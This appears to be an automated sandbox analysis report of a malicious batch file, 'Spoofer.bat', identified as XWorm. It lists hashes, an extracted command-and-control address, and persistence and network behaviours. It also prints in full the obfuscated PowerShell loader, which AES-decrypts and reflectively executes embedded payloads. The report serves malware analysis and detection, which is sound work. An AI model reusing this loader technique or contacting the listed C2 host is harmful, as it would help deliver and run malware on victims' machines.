Analysis
-
max time kernel
141s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
25-01-2025 15:00
Static task
static1
Behavioral task
behavioral1
Sample
Spoofer.bat
Resource
win7-20240729-en
General
-
Target
Spoofer.bat
-
Size
293KB
-
MD5
eafc5ba9f6f74bfced619180451718d1
-
SHA1
1bf80060b1af65d0ae1c4e10ba681acdb97127da
-
SHA256
1ecacd9c2ab0bc3acfde09e2819c2390e231110f5923fdd9ee26dfe76ccd337f
-
SHA512
391e30a38a44bdde182a982067a68442e41f4d43cfee136fd7560c56cc0a537da03dcb6241675c69f3d57bd09d5f385d2674f9f708f450d88cc1314009e6d591
-
SSDEEP
3072:3W+656Qjki8jgdcsZ9nd7Ab62C2TMT/CuL9j0XqwQ/HJ7kntdCoq+Saafyl9w5:3W+IWgdc0ZAu2m/7LdZwYHJmDFSJCi5
Malware Config
Extracted
xworm
kind-sofa.gl.at.ply.gg:31503
-
Install_directory
%ProgramData%
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/3592-15-0x0000025828AC0000-0x0000025828AD8000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 64 IoCs
flow pid Process 16 3592 powershell.exe 19 3592 powershell.exe 20 3592 powershell.exe 23 3592 powershell.exe 27 3592 powershell.exe 28 3592 powershell.exe 29 3592 powershell.exe 30 3592 powershell.exe 32 3592 powershell.exe 33 3592 powershell.exe 37 3592 powershell.exe 38 3592 powershell.exe 39 3592 powershell.exe 40 3592 powershell.exe 43 3592 powershell.exe 44 3592 powershell.exe 52 3592 powershell.exe 54 3592 powershell.exe 57 3592 powershell.exe 58 3592 powershell.exe 60 3592 powershell.exe 61 3592 powershell.exe 62 3592 powershell.exe 63 3592 powershell.exe 64 3592 powershell.exe 65 3592 powershell.exe 66 3592 powershell.exe 67 3592 powershell.exe 68 3592 powershell.exe 69 3592 powershell.exe 70 3592 powershell.exe 71 3592 powershell.exe 72 3592 powershell.exe 73 3592 powershell.exe 74 3592 powershell.exe 75 3592 powershell.exe 76 3592 powershell.exe 77 3592 powershell.exe 78 3592 powershell.exe 79 3592 powershell.exe 83 3592 powershell.exe 84 3592 powershell.exe 85 3592 powershell.exe 86 3592 powershell.exe 87 3592 powershell.exe 88 3592 powershell.exe 89 3592 powershell.exe 90 3592 powershell.exe 91 3592 powershell.exe 92 3592 powershell.exe 93 3592 powershell.exe 94 3592 powershell.exe 95 3592 powershell.exe 96 3592 powershell.exe 97 3592 powershell.exe 98 3592 powershell.exe 99 3592 powershell.exe 100 3592 powershell.exe 101 3592 powershell.exe 102 3592 powershell.exe 105 3592 powershell.exe 106 3592 powershell.exe 107 3592 powershell.exe 110 3592 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3592 powershell.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\powershell.lnk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\powershell.lnk powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 15 ip-api.com -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3592 powershell.exe 3592 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3592 powershell.exe Token: SeDebugPrivilege 3592 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2416 wrote to memory of 3360 2416 cmd.exe 83 PID 2416 wrote to memory of 3360 2416 cmd.exe 83 PID 3360 wrote to memory of 2192 3360 net.exe 84 PID 3360 wrote to memory of 2192 3360 net.exe 84 PID 2416 wrote to memory of 3592 2416 cmd.exe 85 PID 2416 wrote to memory of 3592 2416 cmd.exe 85
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Spoofer.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2416 -
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
PID:3360 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵PID:2192
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('alu9gNFHG/1+ONNuVv38kB6PYCH5Zwt0aaqQhOABIPQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TJb0r0olCEvhnI4DkaxyfQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $mcfDl=New-Object System.IO.MemoryStream(,$param_var); $qjFRZ=New-Object System.IO.MemoryStream; $CoVvH=New-Object System.IO.Compression.GZipStream($mcfDl, [IO.Compression.CompressionMode]::Decompress); $CoVvH.CopyTo($qjFRZ); $CoVvH.Dispose(); $mcfDl.Dispose(); $qjFRZ.Dispose(); $qjFRZ.ToArray();}function execute_function($param_var,$param2_var){ $TXVMP=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uDvWJ=$TXVMP.EntryPoint; $uDvWJ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Spoofer.bat';$VhdxI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Spoofer.bat').Split([Environment]::NewLine);foreach ($RSEQe in $VhdxI) { if ($RSEQe.StartsWith(':: ')) { $PYavD=$RSEQe.Substring(3); break; }}$payloads_var=[string[]]$PYavD.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3592
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82